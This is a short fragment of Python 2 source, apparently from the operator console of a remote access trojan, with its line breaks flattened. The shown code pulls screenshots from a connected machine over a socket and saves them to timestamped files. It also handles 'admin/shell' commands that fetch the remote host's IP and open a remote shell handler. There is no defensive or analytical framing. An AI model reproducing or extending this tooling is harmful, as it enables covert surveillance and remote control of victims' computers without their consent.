dst = viewbag.all_folders[index] + datetime.today( ).strftime('%Y_%m_%d-%H_%M_%S.png') print '' if check == ebytes.EBYTES.exit_byte: print color.ReturnInfo('Downloading screenshot...') Helper.send_msg(connection, ebytes.EBYTES.confirmation_byte) file_content = Helper.recv_msg(connection) try: f = open(dst, 'wb') f.write(file_content) f.close() print color.ReturnSuccess( 'Screenshot saved: %s\n' % dst) except Exception, e: print color.ReturnError( 'Screenshot error: %s\n' % str(e)) continue else: print color.ReturnError('Screenshot error: %s\n' % str(check)) elif command == "help": print help.help() else: if 'admin/shell::' in command: if not 'admin/shell_exec::' in command: Helper.send_msg(connection, ebytes.EBYTES.host_byte) Helper.shell_ip = Helper.recv_msg(connection) Helper.ShellHandler(index, connection, Helper.shell_ip)